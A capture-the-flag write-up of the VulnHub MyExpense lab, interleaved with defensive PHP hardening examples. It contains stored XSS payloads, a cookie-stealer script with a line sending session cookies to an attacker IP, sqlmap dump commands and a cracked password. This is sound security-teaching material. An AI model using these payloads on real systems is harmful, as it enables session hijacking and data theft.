Machine name: MyExpense: 1
Machine url: https://www.vulnhub.com/entry/myexpense-1,405/
Vulnerable machine IP: 10.160.0.33
Attacker(Kali Machine) IP: 10.160.0.71
1. Network Discovery and Enumeration
The assessment began by identifying active hosts on the network to locate the target.
Host Identification
I performed an ARP scan to identify the target's MAC address and vendor information.
- Command: arp-scan -l
- Result: Confirmed the vulnerable machine is at 10.160.0.33.

All Port and Service Scanning
Next, I conducted a full port scan with version detection to identify the running services.
- Command: nmap 10.160.0.33 -p- -sV -T5 -vv
- Results:
  - Port 80 (HTTP): Apache httpd 2.4.25 (Debian).
  - Ports 38893, 48643, 55613, 59173: multiple instances of Mongoose httpd.


Directory Brute-Forcing
I used ffuf to discover hidden directories and files on the web server.
- Command: ffuf -u "http://10.160.0.33/FUZZ" -w /usr/share/wordlists/dirb/common.txt
- Findings: Discovered several interesting paths including /admin, /config, robots.txt, and signup.php.

2. Vulnerability Research and Initial Access
The initial page of the target website "MyExpense" shows two pages we can reach from here:
1. /login.php
2. /signup.php

Information Leakage
Then I examined robots.txt (found during the directory brute-force), which revealed a disallowed entry for an admin page.

Discovery: This page contained a list of all application users, their roles, and account statuses. I noted that a user named Samuel Lamotte (slamotte) was currently "Inactive".

It looks like we can't activate Samuel Lamotte's account through the normal flow.

Let's try injecting an XSS payload through the signup.php page.

Exploiting Broken Access Control
The signup.php page had a disabled "Sign up" button.
- Action: I bypassed this client-side restriction by editing the HTML in the browser and removing the disabled attribute from the button.
- Result: This allowed me to create a new account successfully.
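The disabled button was the only thing standing between an anonymous visitor and a new account, which is why removing one attribute was enough. The handler below is an added example (it is not the MyExpense application's own code) showing the policy enforced on the server instead: the registration flag, the users table layout, the field names and the database credentials are all assumptions.

```php
<?php
// Added example (not the MyExpense application's own code): a signup handler that
// enforces the "registration closed" policy on the server, so removing the disabled
// attribute from the button changes nothing. The users table layout, the
// $registrationOpen flag, the field names and the DB credentials are assumptions.
declare(strict_types=1);

function handle_signup(PDO $db, bool $registrationOpen, array $post): array
{
    // A disabled button is a UX hint, not a control; the policy is re-checked here.
    if (!$registrationOpen) {
        return ['ok' => false, 'error' => 'registration is closed'];
    }

    $username  = trim((string) ($post['username'] ?? ''));
    $firstname = trim((string) ($post['firstname'] ?? ''));
    $lastname  = trim((string) ($post['lastname'] ?? ''));
    $password  = (string) ($post['password'] ?? '');

    if (!preg_match('/^[a-z0-9_.-]{3,32}$/i', $username)) {
        return ['ok' => false, 'error' => 'invalid username'];
    }
    // Names are restricted to letters, marks, spaces, apostrophes, dots and hyphens.
    // This rejects the obvious <script> payload, but output encoding wherever the
    // name is displayed (the admin listing) remains the primary XSS control.
    foreach ([$firstname, $lastname] as $name) {
        if ($name === '' || mb_strlen($name) > 64 || !preg_match('/^[\p{L}\p{M} \'.-]+$/u', $name)) {
            return ['ok' => false, 'error' => 'invalid name'];
        }
    }
    if (strlen($password) < 12) {
        return ['ok' => false, 'error' => 'password too short'];
    }

    // New accounts start inactive; only an administrator may activate them.
    $stmt = $db->prepare(
        "INSERT INTO users (username, firstname, lastname, password, status)
         VALUES (:u, :f, :l, :p, 'inactive')"
    );
    $stmt->execute([
        ':u' => $username,
        ':f' => $firstname,
        ':l' => $lastname,
        ':p' => password_hash($password, PASSWORD_DEFAULT),
    ]);
    return ['ok' => true];
}

$registrationOpen = false;   // assumed deployment flag; what the disabled button was meant to express
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    // placeholder credentials; database name taken from the sqlmap output later on this page
    $db = new PDO('mysql:host=localhost;dbname=myexpense;charset=utf8mb4', 'app', 'secret',
                  [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);
    $result = handle_signup($db, $registrationOpen, $_POST);
    http_response_code($result['ok'] ? 201 : 403);
    header('Content-Type: application/json');
    echo json_encode($result);
}
```

With the flag false, a POST to signup.php returns 403 regardless of what the browser's DOM looked like; the check lives where the attacker cannot edit it.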


The account has been created.

And our XSS script is also working.

Now we create another account, but this time we modify our XSS payload so that it activates Samuel Lamotte's account for us (the payload goes into the first name and last name fields):
<script>document.write('<img src="http://10.160.0.33/admin/admin.php?id=11&status=active"/>');</script>
The payload was built from the following URL:

We have successfully reactivated Samuel Lamotte's account and can log in to the application using the credentials provided: slamotte/fzghn4lw
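Two weaknesses combined here: the admin listing printed the first and last names without encoding (stored XSS), and admin.php changed an account's status on a plain GET with no proof the administrator meant it. The following is an added example, not the MyExpense code, of an admin endpoint where neither works; the users table, the session 'role' field and the database credentials are assumptions.

```php
<?php
// Added example, not MyExpense code: an admin status endpoint that the forced
// request above (an <img> fetching admin.php?id=11&status=active from a victim's
// browser) cannot drive. Table/column names, the session 'role' field and the
// DB credentials are assumptions.
declare(strict_types=1);

function e(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

function csrf_token(array &$session): string
{
    if (empty($session['csrf'])) {
        $session['csrf'] = bin2hex(random_bytes(32));
    }
    return $session['csrf'];
}

function change_status(PDO $db, array $session, string $method, array $post): array
{
    // 1. Authorisation comes from the server-side session, never from the URL.
    if (($session['role'] ?? '') !== 'admin') {
        return ['code' => 403, 'error' => 'admin role required'];
    }
    // 2. State changes only on POST. An injected <img> or <script src> can only
    //    issue GET, so the stored payload never reaches the UPDATE below.
    if ($method !== 'POST') {
        return ['code' => 405, 'error' => 'POST required'];
    }
    // 3. Per-session CSRF token. This stops requests forged from other origins;
    //    it does not stop script already running inside the admin's own page,
    //    which is why the output encoding in render_user_row() is the control
    //    against the stored XSS itself.
    $token = (string) ($session['csrf'] ?? '');
    if ($token === '' || !hash_equals($token, (string) ($post['csrf'] ?? ''))) {
        return ['code' => 403, 'error' => 'invalid CSRF token'];
    }
    // 4. Allowlisted status and integer id, both bound as parameters.
    $id = filter_var($post['id'] ?? null, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    $status = (string) ($post['status'] ?? '');
    if ($id === false || !in_array($status, ['active', 'inactive'], true)) {
        return ['code' => 400, 'error' => 'invalid id or status'];
    }
    $stmt = $db->prepare('UPDATE users SET status = :s WHERE id = :id');
    $stmt->execute([':s' => $status, ':id' => $id]);
    return ['code' => 200];
}

// User listing. First and last names were typed by the user at signup, so they are
// encoded on output: a stored <script>document.write(...)</script> is shown as text.
function render_user_row(array $u, string $csrf): string
{
    $next = $u['status'] === 'active' ? 'inactive' : 'active';
    return '<tr><td>' . e($u['username']) . '</td>'
         . '<td>' . e($u['firstname']) . ' ' . e($u['lastname']) . '</td>'
         . '<td>' . e($u['status']) . '</td>'
         . '<td><form method="post" action="admin.php">'
         . '<input type="hidden" name="csrf" value="' . e($csrf) . '">'
         . '<input type="hidden" name="id" value="' . (int) $u['id'] . '">'
         . '<button name="status" value="' . $next . '">set ' . $next . '</button>'
         . '</form></td></tr>';
}

session_start();
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    // placeholder credentials; database name taken from the sqlmap output later on this page
    $db = new PDO('mysql:host=localhost;dbname=myexpense;charset=utf8mb4', 'app', 'secret',
                  [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);
    $result = change_status($db, $_SESSION, $_SERVER['REQUEST_METHOD'], $_POST);
    http_response_code($result['code']);
}
```

The order of the checks matters for the write-up's scenario: the GET from the injected image fails at step 2 even if the admin is logged in, and the name that carried the payload is rendered as inert text by step 4's listing, so there is no script to reach step 3 in the first place.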

With Samuel's account active, we logged in as him.

Next we check the expenses section. Per the machine's description, our goal is to get our last expense report validated, so we submit the report.



While browsing the profile section we found the manager's name: Manon Riviere

Now we have to escalate to the manager's account.
Navigating to index.php, we discovered a stored XSS vulnerability in what appears to be the managers' messaging system.

3. Stealing the Manager's Session
I set up a PHP cookie stealer on my attacker machine (10.160.0.71) to capture active sessions.
- Go to /var/www/html
- Attacker Script (cookie.php):
<?php
// Appends whatever arrives in the cmd parameter (the victim's cookies) to log.txt
$cookies = $_GET['cmd'] ?? '';
$file = fopen('log.txt', 'a');
fwrite($file, $cookies . "\n");
fclose($file);
?>
- Listening Command: php -S 10.160.0.71:80
Then I used an XSS payload to force the administrator's browser to send its session cookie to my server.
We are going to use the same cookie stealer to get the manager's PHPSESSID.
<script>document.write('<img src="http://10.160.0.71/cookie.php?cmd='+document.cookie+'" />');</script>
We placed this payload in the message section to collect the PHPSESSIDs of other users as well as the manager's.
We captured many PHPSESSIDs…

And we also got the manager's PHPSESSID.

We used the Cookie Editor extension in Firefox to replace our own cookie with the captured one.

By hijacking the session of the manager, Manon Riviere (mriviere), I gained elevated access to the application.
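The hijack worked because document.cookie exposed PHPSESSID to page script, the stored message was rendered as live HTML, and the captured ID stayed valid indefinitely in any browser. Below is an added example, not MyExpense code, of the session and header settings that take each of those away; the uid/role session fields and the message record layout are assumptions.

```php
<?php
// Added example, not MyExpense code: session and header settings that leave the
// cookie stealer above with nothing useful to collect. The uid/role session fields
// and the message record layout are assumptions.
declare(strict_types=1);

// 1. Cookie flags. HttpOnly keeps PHPSESSID out of document.cookie, so the injected
//    '...cookie.php?cmd='+document.cookie payload would send an empty string.
//    SameSite and Secure limit where the cookie is sent at all (Secure needs HTTPS).
session_set_cookie_params([
    'lifetime' => 0,
    'path'     => '/',
    'secure'   => true,
    'httponly' => true,
    'samesite' => 'Strict',
]);
ini_set('session.use_strict_mode', '1');   // reject session IDs the server never issued
session_start();

// 2. A CSP without 'unsafe-inline' blocks inline <script> blocks outright, and
//    img-src 'self' blocks the <img> request to 10.160.0.71 even if one ran.
header("Content-Security-Policy: default-src 'self'; img-src 'self'; script-src 'self'");

// Called once credentials have been verified by the login handler.
function establish_session(int $uid, string $role): void
{
    // 3. Fresh session ID on login, so an ID captured or fixed before login
    //    never turns into a logged-in session.
    session_regenerate_id(true);
    $_SESSION['uid']    = $uid;
    $_SESSION['role']   = $role;
    $_SESSION['issued'] = time();
}

// 4. Absolute lifetime: a copied session ID stops working after one hour even if
//    the theft is never noticed.
function session_is_valid(int $maxAgeSeconds = 3600): bool
{
    return isset($_SESSION['uid'], $_SESSION['issued'])
        && (time() - (int) $_SESSION['issued']) < $maxAgeSeconds;
}

// 5. Message bodies in the managers' messaging system are encoded on output, so a
//    stored payload is displayed as text rather than executed in the manager's browser.
function render_message(array $m): string
{
    $enc = fn(string $s): string => htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '<p><b>' . $enc($m['from']) . '</b>: ' . $enc($m['body']) . '</p>';
}
```

The lab runs over plain HTTP, so 'secure' => true would prevent the cookie from being sent at all there; in a real deployment that is the point, and the site is served over TLS.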

As the manager, we now pass the expense.



When we log back into Samuel Lamotte's account we can see that our report has been validated; however, we still do not see the flag.

4. Escalating to Finance Approver Account
In /index.php we found one more person, a Financial Approver, whose approval the status of our report still requires.
Now we have to escalate to the Finance Approver account (Paul Baudouin) to pass that expense.

After some manual testing, we discovered an SQL injection vulnerability in the Rennes (Manager) page.
SQL Injection (SQLi)
While navigating the manager's site page, I discovered a GET-based SQL injection vulnerability in the id parameter.
- Tool: sqlmap
- Command: sqlmap -u http://10.160.0.33/site.php?id=2 --headers="User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:25.0) Gecko/20100101 Firefox/25.0" --cookie="PHPSESSID=d76dcp7demcfq8777t8dsmna63"


Next we enumerate the tables:
# sqlmap -u http://10.160.0.33/site.php?id=2 --headers="User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:25.0) Gecko/20100101 Firefox/25.0" --cookie="PHPSESSID=d76dcp7demcfq8777t8dsmna63" --tables

We got the database and four tables. Let's check the expense table, as we need to pass the expense.

Dumping the data from the expense table, we gather a list of users and their hashed passwords:
# sqlmap -u http://10.160.0.33/site.php?id=2 --headers="User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:25.0) Gecko/20100101 Firefox/25.0" --cookie="PHPSESSID=d76dcp7demcfq8777t8dsmna63" --dump --tables -D myexpense -T expense
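sqlmap could enumerate and dump the whole myexpense database from one parameter because site.php built its query from the raw id value. The following is an added example, not the MyExpense code, of that pattern beside its parameterised form; the site table and its columns are assumptions.

```php
<?php
// Added example, not MyExpense code: the query pattern that makes site.php?id=2
// injectable, beside the parameterised version. The site table, its columns and
// the DB credentials are assumptions.
declare(strict_types=1);

// Vulnerable: the id value is pasted into the SQL text, so any SQL appended to it
// becomes part of the statement and the database answers for the whole schema.
function get_site_vulnerable(PDO $db, array $get): ?array
{
    $sql = 'SELECT id, name FROM site WHERE id = ' . ($get['id'] ?? '0');
    return $db->query($sql)->fetch(PDO::FETCH_ASSOC) ?: null;
}

// Fixed: validate the type first, then bind the value; the SQL text never changes.
function get_site(PDO $db, array $get): ?array
{
    $id = filter_var($get['id'] ?? null, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        http_response_code(400);
        return null;
    }
    $stmt = $db->prepare('SELECT id, name FROM site WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetch(PDO::FETCH_ASSOC) ?: null;
}

// Connection settings that keep the fix honest: real server-side prepares rather
// than client-side emulation, and exceptions instead of silently ignored errors.
function connect(): PDO
{
    // placeholder credentials; database name from the sqlmap output above
    return new PDO('mysql:host=localhost;dbname=myexpense;charset=utf8mb4', 'app', 'secret', [
        PDO::ATTR_EMULATE_PREPARES => false,
        PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
    ]);
}

// Detailed database errors are logged, not echoed; error text in responses is what
// error-based injection techniques read from.
ini_set('display_errors', '0');
ini_set('log_errors', '1');

$site = get_site(connect(), $_GET);
```

A defensive complement not shown here is the database account itself: a web user that only needs SELECT on site should not also be able to read the table holding password hashes, which limits what a future injection bug can reach.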


We grab the password hash for user pbaudouin, submit it to CrackStation and successfully retrieve the plaintext password.
Password Cracking
I used an online cracker to recover the finance approver's password from its hash.
- Hash: 64202ddd5fea4cc5c2f856efef36e1a
- Result: Password cracked as HackMe.
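The hash fell to a lookup table because it was a single fast, unsalted digest of a short password. Assuming the stored hashes are unsalted MD5 (which the hex form and the CrackStation lookup are consistent with), the following is an added example, not MyExpense code, of verifying against such a legacy hash and replacing it with a salted, slow hash the next time the user logs in; the users table layout is an assumption.

```php
<?php
// Added example, not MyExpense code: replace unsalted MD5 with password_hash(),
// upgrading legacy hashes transparently at login. Assumes the stored hashes are
// 32-hex MD5 and a users(id, password) table.
declare(strict_types=1);

function looks_like_md5(string $h): bool
{
    return (bool) preg_match('/^[0-9a-f]{32}$/i', $h);
}

// Returns true when $password matches $stored. Legacy MD5 entries are verified in
// constant time and then rewritten with a salted, work-factor hash, so the set of
// lookup-table targets shrinks with every successful login.
function verify_and_upgrade(PDO $db, int $userId, string $password, string $stored): bool
{
    if (looks_like_md5($stored)) {
        if (!hash_equals(strtolower($stored), md5($password))) {
            return false;
        }
        $rehash = true;
    } else {
        if (!password_verify($password, $stored)) {
            return false;
        }
        // Also picks up hashes made with an older algorithm or lower cost.
        $rehash = password_needs_rehash($stored, PASSWORD_DEFAULT);
    }

    if ($rehash) {
        $stmt = $db->prepare('UPDATE users SET password = :p WHERE id = :id');
        $stmt->execute([
            ':p'  => password_hash($password, PASSWORD_DEFAULT),
            ':id' => $userId,
        ]);
    }
    return true;
}

// New or reset passwords never touch md5() at all.
function store_new_password(PDO $db, int $userId, string $password): void
{
    $stmt = $db->prepare('UPDATE users SET password = :p WHERE id = :id');
    $stmt->execute([':p' => password_hash($password, PASSWORD_DEFAULT), ':id' => $userId]);
}
```

PASSWORD_DEFAULT currently selects bcrypt with a per-hash random salt, so identical passwords produce different stored values and a precomputed table of MD5 digests is useless against them.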

5. Capturing the Flag
Logging into the account belonging to Paul Baudouin using credentials pbaudouin/HackMe and navigating to the expenses tab we can see the expense report for Samuel Lamotte and validate it.

Let's approve these expense reports.

Approving all these expenses.

Finally, we log back into the account belonging to Samuel Lamotte and navigate to the expense tab.

The flag is: flag{H4CKY0URL1F3}
Written by Ankush Prasad Sah